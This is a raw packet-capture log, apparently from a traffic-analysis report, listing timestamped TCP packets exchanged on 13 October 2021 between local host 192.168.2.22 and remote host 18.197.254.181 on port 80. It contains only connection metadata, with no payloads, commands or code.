Oct 13, 2021 20:15:52.913281918 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.913295984 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913319111 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913319111 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.913330078 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.913343906 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913353920 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.913368940 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913381100 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.913402081 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.914474010 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915488958 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915527105 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915550947 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915568113 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915585995 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915604115 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915605068 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915623903 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915644884 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915667057 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915669918 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915683031 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915694952 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915704012 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915719986 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915729046 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915744066 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915754080 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915767908 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915777922 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915796041 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915805101 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915822029 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915829897 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915846109 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915854931 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915870905 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915879965 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915896893 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915903091 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915920973 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915929079 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915946007 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915955067 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915970087 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.915978909 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.915997982 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.916006088 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.916023016 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.916033983 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.916045904 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.916048050 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.916070938 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.916079998 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.916095018 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.916105986 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.916117907 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.916126966 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.916141987 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.916151047 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.916167021 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.916177988 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.916194916 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.916201115 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.916222095 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.916259050 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.916269064 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.916280985 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.916295052 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.917301893 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.931936979 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.931982040 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.932002068 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.932024956 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.932050943 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.932071924 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.932095051 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.932110071 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.932118893 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.932143927 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.932148933 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.932152987 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.933182955 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.933217049 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.933237076 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.933258057 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.933281898 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.933284998 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.933307886 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.933310032 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.933316946 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.933336020 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.933343887 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.933361053 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.933370113 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.933393955 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.936377048 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.936650991 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.936758995 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.936806917 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.936834097 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.936849117 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937096119 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937155008 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937412977 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937469959 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937504053 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937547922 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937731981 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937753916 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937778950 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937782049 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937789917 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937809944 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937813997 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937834024 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937855959 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937860012 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937876940 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937886953 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937895060 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937911987 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937927008 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937937021 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937943935 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937961102 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937972069 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.937989950 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.937994957 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938016891 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938030005 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938044071 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938060045 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938071012 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938079119 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938097000 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938108921 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938122034 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938131094 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938146114 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938159943 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938169956 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938193083 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938199043 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938210011 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938224077 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938229084 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938249111 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938268900 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938273907 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938285112 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938297987 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938308954 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938323021 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938333035 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938349009 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938354969 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938374043 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.938389063 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.938407898 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.939147949 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.950683117 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950721025 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950733900 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950754881 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950777054 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950798988 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950820923 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950841904 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950867891 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950890064 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.950896025 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950920105 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950921059 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.950925112 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.950928926 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.950932980 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.950942993 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950959921 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.950968027 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.950975895 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.950989962 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.951001883 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.951014042 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.951018095 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.951039076 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.951047897 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.951071978 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.951870918 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.951905966 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.951927900 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.951950073 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.951972008 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.951992989 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.952019930 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.952028036 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.952044964 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.952054024 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.952058077 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.952069998 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.952078104 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.952094078 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.952104092 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.952119112 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.952133894 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.952143908 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.952152014 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.952167034 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.952177048 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.952191114 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.952200890 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.952218056 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.952225924 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.952241898 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.952254057 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.952270031 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.955044985 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.955081940 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.955105066 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.955161095 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.955185890 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.955188990 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.955209017 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.955214024 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.955218077 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.955221891 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.955241919 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.955481052 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.955503941 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.955539942 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.955730915 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.955755949 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.955780029 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.955800056 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.955857992 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.955883026 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.955900908 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.955912113 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.956777096 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.956805944 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.956828117 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.956850052 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.956873894 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.956877947 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.956897020 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.956901073 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.956901073 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.956924915 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.956948996 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.956958055 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.956964970 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.956983089 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.956990957 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957006931 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957020998 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957031965 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957040071 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957056046 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957065105 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957079887 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957093954 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957107067 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957110882 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957143068 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957734108 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957756996 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957776070 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957801104 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957825899 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957829952 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957847118 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957850933 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957859039 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957875013 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957885027 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957904100 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957912922 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957930088 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957937956 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957954884 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.957962990 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.957988024 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958002090 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958012104 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958019972 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958038092 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958045959 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958060980 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958070993 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958089113 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958095074 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958116055 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958126068 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958138943 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958148003 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958163977 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958173990 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958188057 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958201885 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958211899 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958216906 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958237886 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958249092 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958261967 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958265066 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958290100 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958302021 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958317041 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958329916 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958342075 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958343983 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958367109 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958379030 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958390951 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958395004 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958416939 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958422899 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958442926 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958456039 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958467007 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958492994 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958511114 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958525896 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958548069 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958549023 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958573103 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958586931 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958592892 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958596945 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958611965 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958621979 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958627939 CEST	49165	80	192.168.2.22	18.197.254.181
